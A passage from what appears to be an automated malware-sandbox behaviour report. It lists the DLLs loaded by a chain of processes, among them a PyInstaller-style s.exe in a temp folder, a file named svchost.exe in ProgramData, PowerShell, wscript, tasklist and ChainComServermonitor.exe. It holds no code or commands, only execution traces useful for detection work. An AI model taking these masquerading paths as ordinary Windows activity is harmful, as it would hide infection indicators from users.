Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe	Section loaded: dxgidebug.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\ProgramData\svchost.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll
Source: C:\ProgramData\svchost.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll
Source: C:\ProgramData\svchost.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll
Source: C:\ProgramData\svchost.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll
Source: C:\ProgramData\svchost.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll
Source: C:\ProgramData\svchost.exe	Section loaded: version.dll
Source: C:\ProgramData\svchost.exe	Section loaded: dxgidebug.dll
Source: C:\ProgramData\svchost.exe	Section loaded: sfc_os.dll
Source: C:\ProgramData\svchost.exe	Section loaded: sspicli.dll
Source: C:\ProgramData\svchost.exe	Section loaded: rsaenh.dll
Source: C:\ProgramData\svchost.exe	Section loaded: uxtheme.dll
Source: C:\ProgramData\svchost.exe	Section loaded: dwmapi.dll
Source: C:\ProgramData\svchost.exe	Section loaded: cryptbase.dll
Source: C:\ProgramData\svchost.exe	Section loaded: riched20.dll
Source: C:\ProgramData\svchost.exe	Section loaded: usp10.dll
Source: C:\ProgramData\svchost.exe	Section loaded: msls31.dll
Source: C:\ProgramData\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\ProgramData\svchost.exe	Section loaded: windowscodecs.dll
Source: C:\ProgramData\svchost.exe	Section loaded: textinputframework.dll
Source: C:\ProgramData\svchost.exe	Section loaded: coreuicomponents.dll
Source: C:\ProgramData\svchost.exe	Section loaded: coremessaging.dll
Source: C:\ProgramData\svchost.exe	Section loaded: ntmarta.dll
Source: C:\ProgramData\svchost.exe	Section loaded: wintypes.dll
Source: C:\ProgramData\svchost.exe	Section loaded: wintypes.dll
Source: C:\ProgramData\svchost.exe	Section loaded: wintypes.dll
Source: C:\ProgramData\svchost.exe	Section loaded: windows.storage.dll
Source: C:\ProgramData\svchost.exe	Section loaded: wldp.dll
Source: C:\ProgramData\svchost.exe	Section loaded: propsys.dll
Source: C:\ProgramData\svchost.exe	Section loaded: profapi.dll
Source: C:\ProgramData\svchost.exe	Section loaded: edputil.dll
Source: C:\ProgramData\svchost.exe	Section loaded: urlmon.dll
Source: C:\ProgramData\svchost.exe	Section loaded: iertutil.dll
Source: C:\ProgramData\svchost.exe	Section loaded: srvcli.dll
Source: C:\ProgramData\svchost.exe	Section loaded: netutils.dll
Source: C:\ProgramData\svchost.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\ProgramData\svchost.exe	Section loaded: policymanager.dll
Source: C:\ProgramData\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\ProgramData\svchost.exe	Section loaded: appresolver.dll
Source: C:\ProgramData\svchost.exe	Section loaded: bcp47langs.dll
Source: C:\ProgramData\svchost.exe	Section loaded: slc.dll
Source: C:\ProgramData\svchost.exe	Section loaded: userenv.dll
Source: C:\ProgramData\svchost.exe	Section loaded: sppc.dll
Source: C:\ProgramData\svchost.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\ProgramData\svchost.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\ProgramData\svchost.exe	Section loaded: pcacli.dll
Source: C:\ProgramData\svchost.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dlnashext.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wpdshext.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: slc.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Section loaded: sspicli.dll
